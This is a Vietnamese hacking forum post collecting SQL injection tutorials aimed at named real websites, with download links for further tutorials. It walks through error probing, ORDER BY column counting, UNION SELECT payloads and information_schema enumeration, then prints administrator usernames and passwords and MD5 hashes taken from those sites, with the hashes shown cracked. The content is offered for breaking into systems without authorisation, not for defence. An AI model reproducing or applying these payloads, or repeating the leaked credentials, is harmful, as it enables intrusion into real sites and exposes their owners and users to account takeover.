sql order khó audiotrend.com
http://www.mediafire.com/?w8039nqewafp17h


sql-ko hiện số-lystravel.com.vn
http://www.mediafire.com/?59n683pn8p04oba
pass:mumauden 


sql-html-khó thegioinghesi.com
http://www.mediafire.com/?1fz6e1cmm9n8b6z


Sql-Replace-spaadam.com
http://www.mediafire.com/?0h2dkw6cc3k2fvf


sql-406Accept-mp3hungama.com
http://www.mediafire.com/?v7ayn2wx2qs52s6
PASS:tghmmd


TUT Hack SQL by Goodboy


http://hoffmans.co.za/shopdisplayproducts.asp?id=1'
oh site này bị lỗi:"Microsoft OLE DB Provider for ODBC Drivers error '80040e14'


[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1' Order By specialOffer DESC, cname'.


/shop$db.asp, line 831"
Hehe thêm đoạn check này vào xem nhá:
%20union%20%20select%201%20from%20tbluser%27
"Microsoft OLE DB Provider for ODBC Drivers error '80004005'


[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.


/shop$db.asp, line 831"
Gì nữa???? Sao lạ lạ
Thêm vào code: 1%20union%20%20select%201,2%20from%20tbluser%27
tự ngồi dò,dò mỏi cả mắt bỗng hiện ra cái bảng sáng cả mắt:
link dò tới 30 khổ quá:http://hoffmans.co.za/shopdisplaypro...m%20tbluser%27


Số ta có được 3,4,21,22
Chọn số nào cũng được tui chọn tạm 3 and 21 thay nhé thay 3= " fldusername"
21=" fldpassword"
Ta có link: http://hoffmans.co.za/shopdisplaypro...m%20tbluser%27


ID và pass: Mike/sweet
Thấy tut viết chữ này hay thì thank cái , mỏi mắt mỏi lưng ùi.đi ngủ
TUT Hack SQL Site:"http://sinotruk.com.vn/" By GoodBoy




Link login admin trước nhé:http://sinotruk.com.vn/admin/login.asp
http://sinotruk.com.vn/news.asp?tin_ID=98
check dấu ' à dính lỗi
http://sinotruk.com.vn/news.asp?tin_ID=98'


Microsoft OLE DB Provider for ODBC Drivers error '80040e14'


[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'tin_ID=98''.


/news.asp, line 16




bây giờ tiếp ta khai thác columns
nó sẽ ra thế này:


Microsoft OLE DB Provider for ODBC Drivers error ’80004005′ [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.
/tintuc.asp, line 20


union select 0,1,2,3,4,5,6 from tb_admin
à có lỗi "mày hả bưởi"
Có số 1,3,4 ta thay 3 bằng username
4= password
có link dạng: union select 0,1,2,username,password,5,6 from tb_admin
http://sinotruk.com.vn/news.asp?tin_ID=98 union select 0,1,2,username,password,5,6 from tb_admin
có được id và pass: Admin/giabao3.0
Thấy hay thì thank nha
Nguồn : HackerVN.forum.st


Site này dễ, nhưng forum hiện không có nhiều TUT nên pi cũng đú tí, ae đừng chê bai
Mã:


http://lamtruccuong.com.vn


Link lỗi:
Mã:


http://lamtruccuong.com.vn/product_d...og=2&primary=1'


Có lỗi rồi, cứ thực hiện từ từ thôi


1. Order by:
- Order by 32--
~~> lỗi
- Order by 31--
~~> OK
Vậy là có 31 table


2. Tìm vị trí lỗi
Mã:


union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31-- -


Có 3 chỗ: 5, 15, 22.
Chọn 1 chỗ mà đào mỏ


3. Check version
Kiểm tra cái ver để tiện đào mỏ nhé
Mã:


union select 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31-- -


Quote:
5.0.67-community
Ver 5 là tốt rồi


4. Get table
Mã:


union select 1,2,3,4,group_concat(0x20,table_name),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31 from information_schema.tables where table_schema=database() -- -


Note: thêm cái "0x20" trong group_concat() để tạo dấu cách trong kết quả, dễ nhìn và kết quả không bị che lấp (tránh trường hợp bị thiếu table)
Kết quả:
Quote:
tblAccount, tblAccount_tblFunction, tblAdCompany, tblAdvertisement, tblFunction, tbl_ads, tbl_category_company, tbl_category_company_code, tbl_category_company_sub, tbl_category_company_sub_code, tbl_contact_mail, tbl_logo, tblcontact, tblcontact_code, tbllanguage_code, tbllanguages, tblproduct, tblproduct_code, tblsupport, tbltabmenu, tbltabmenu_code, useronline
5. Get column
Mình get trong table tblAccount nhé.
Mã hex của tblAccount: 0x74626c4163636f756e74
Mã:


union select 1,2,3,4,group_concat(0x20,column_name),6,7,8,9,10, 11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.columns where table_schema=database() and table_name=0x74626c4163636f756e74-- -


Quote:
account_id, username, pwd, isActived, isLock
6. Chôm cái username và pwd
Mã:


union select 1,2,3,4,group_concat(0x20,username,0x7c,pwd),6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31 from tblAccount-- -


Và đây:
Quote:
admin|e10adc3949ba59abbe56e057f20f883e, tai|e10adc3949ba59abbe56e057f20f883e
Việc còn lại là crack md5. Ae cứ google mà đập cái đống mã kia vào
Quote:
admin|123456, tai|123456
END TUT.

Đăng nhận xét